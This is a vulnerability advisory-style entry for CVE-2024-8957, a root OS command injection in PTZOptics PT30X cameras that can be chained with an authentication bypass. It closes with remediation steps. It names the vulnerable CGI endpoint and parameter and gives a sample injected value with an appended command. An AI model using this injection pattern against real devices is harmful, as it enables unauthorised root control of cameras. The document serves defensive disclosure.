CVE-2024-8957

What are PTZOptics PT30X Cameras?

PTZOptics PT30X-SDI and PT30X-NDI are pan-tilt-zoom (PTZ) cameras used in broadcast studios, corporate conference rooms, houses of worship, and live streaming productions for professional video capture. These cameras expose a web management interface and CGI API for remote control — adjusting pan/tilt/zoom, configuring network settings, and updating firmware. Like many IoT cameras, they run an embedded Linux OS with a privileged web server, and their management interfaces are frequently exposed to the network or internet for remote operation.

Overview

CVE-2024-8957 is an OS command injection vulnerability in the PTZOptics PT30X-SDI/NDI camera's CGI interface, exploitable by an authenticated attacker with admin privileges via the ntp_addr parameter of the /cgi-bin/param.cgi endpoint. When combined with CVE-2024-8956 (an IDOR authentication bypass in the same cameras, already enriched), the chain produces unauthenticated root-level OS command execution: CVE-2024-8956 provides a mechanism to access the admin interface without credentials, and CVE-2024-8957 executes OS commands as root once admin access is established. Both were discovered by Nozomi Networks and added to the CISA KEV catalog simultaneously in November 2024.

Affected Versions

Technical Details

CWE-78 (Improper Neutralization of Special Elements used in an OS Command). The CGI script /cgi-bin/param.cgi accepts an ntp_addr parameter intended to configure the NTP server address for the camera. This value is passed directly to a shell command (such as an NTP configuration utility) without sanitization. An attacker with admin access can supply a crafted value like 8.8.8.8; malicious_command that causes the camera to execute arbitrary OS commands as root.

When chained with CVE-2024-8956:

1. CVE-2024-8956 — Bypasses authentication via an IDOR flaw, granting access to the admin CGI interface without credentials.
2. CVE-2024-8957 — Injects OS commands through the ntp_addr parameter, executing as root.

The result is unauthenticated root RCE on any network-accessible camera running vulnerable firmware.

Discovery

Discovered by Nozomi Networks' research team and disclosed alongside CVE-2024-8956 as a two-vulnerability chain.

Exploitation Context

PTZ cameras used in corporate and broadcast environments are often network-connected and may be remotely accessible for AV production support, making them reachable attack targets. Compromised IoT cameras have been recruited into botnets, used for network reconnaissance, and leveraged as persistence footholds on corporate networks. The root OS access on a camera device provides an attacker with a persistent network presence that is typically not covered by traditional EDR solutions.

Remediation

1. Update PTZOptics PT30X-SDI and PT30X-NDI cameras to firmware 6.3.40 or later.
2. Restrict camera management interface access to authorized network segments — cameras should not have their web management interfaces exposed to the internet.
3. Place IoT/AV devices on a dedicated VLAN isolated from business-critical systems.
4. See also CVE-2024-8956 (authentication bypass) — both vulnerabilities are fixed by the same firmware update.